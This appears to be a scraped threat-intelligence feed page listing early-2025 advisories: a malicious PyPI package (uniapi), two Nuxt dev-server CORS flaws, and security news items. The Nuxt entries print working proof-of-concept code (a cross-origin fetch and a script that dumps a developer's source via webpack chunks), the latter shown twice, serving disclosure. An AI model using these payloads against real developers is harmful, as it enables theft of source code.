CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!
Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
|
Description: uniapi version 1.0.7 introduces code that would execute on import of the module and download a script from a remote URL, and would then execute the downloaded script in a thread. The downloaded script would harvest system information and POST the information to another remote URL. This code was found in the PyPI release artifacts and was not present in the public GitHub repository.
References
https://github.com/pypa/advisory-database/tree/main/vulns/uniapi/PYSEC-2025-2.yaml
https://inspector.pypi.io/project/uniapi/1.0.7/packages/0f/40/c6e06c22bbc22ef45f40bf5a7711763fa08fec4d16b4718d86fd60970131/uniapi-1.0.7.tar.gz/uniapi-1.0.7/uniapi/__init__.py#line.11
https://github.com/advisories/GHSA-gvvw-rr8m-fj76
January 27th, 2025 (5 months ago)
|
CVE-2025-24360 |
Description: Summary
Nuxt allows any websites to send any requests to the development server and read the response due to default CORS settings.
Details
While Vite patched the default CORS settings to fix https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6, nuxt uses its own CORS handler by default (https://github.com/nuxt/nuxt/pull/23995).
https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/client.ts#L257-L263
That CORS handler sets Access-Control-Allow-Origin: *.
[!IMPORTANT]If on an affected version, it may be possible to opt-out of the default Nuxt CORS handler by configuring vite.server.cors.
PoC
Start a dev server in any nuxt project using Vite by nuxt dev.
Send a fetch request to http://localhost:3000/_nuxt/app.vue (fetch('http://localhost:3000/_nuxt/app.vue')) from a different origin page.
Impact
Users with the default server.cors option using Vite builder may get the source code stolen by malicious websites
Additional Information
/__nuxt_vite_node__/manifest / /__nuxt_vite_node__/module also seems to have Access-Control-Allow-Origin: *, so it maybe also possible to exploit that handler.
https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/vite-node.ts#L39
Although I didn't find a valid module id.
Note that this handler is probably also vulnerable to DNS rebinding attacks as I didn't find any host header checks.
References
https://github.com/nuxt/nuxt/security/advisories/GHS...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|
|
CVE-2025-24361 |
Description: Summary
Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script.
By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.
PoC
Create a nuxt project with webpack / rspack builder.
Run npm run dev
Open http://localhost:3000
Run the script below in a web site that has a different origin.
You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
for (const page in window.webpackChunknuxt_app) {
const moduleList = window.webpackChunknuxt_app[page][1]
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
}
})
document.head.appendChild(script)
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in t...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|
|
CVE-2025-24361 |
Description: Summary
Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script.
By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.
PoC
Create a nuxt project with webpack / rspack builder.
Run npm run dev
Open http://localhost:3000
Run the script below in a web site that has a different origin.
You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
for (const page in window.webpackChunknuxt_app) {
const moduleList = window.webpackChunknuxt_app[page][1]
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
}
})
document.head.appendChild(script)
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in t...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|
|
|
Description: The Open Web Application Security Project has recently introduced a new Top 10 project - the Non-Human Identity (NHI) Top 10. For years, OWASP has provided security professionals and developers with essential guidance and actionable frameworks through its Top 10 projects, including the widely used API and Web Application security lists.
Non-human identity security represents an emerging
January 27th, 2025 (5 months ago)
|
|
|
January 27th, 2025 (5 months ago)
|
|
|
Description: UnitedHealth Group has disclosed that the February 2024 ransomware attack on its Change Healthcare subsidiary affected approximately 190 million individuals, nearly double its initial estimate of 100 million. The confirmation, provided to TechCrunch late Friday, makes this the largest medical data breach in U.S. history. In a statement, UnitedHealth spokesperson Tyler Mason acknowledged the staggering …
The post UnitedHealth Data Breach Tally Upped to 190 Million Americans appeared first on CyberInsider.
January 27th, 2025 (5 months ago)
|
|
|
January 27th, 2025 (5 months ago)
|
|
|
Description: A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities.
The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon.
January 27th, 2025 (5 months ago)
|
|
|
Description: Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC.
"MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,"
January 27th, 2025 (5 months ago)
|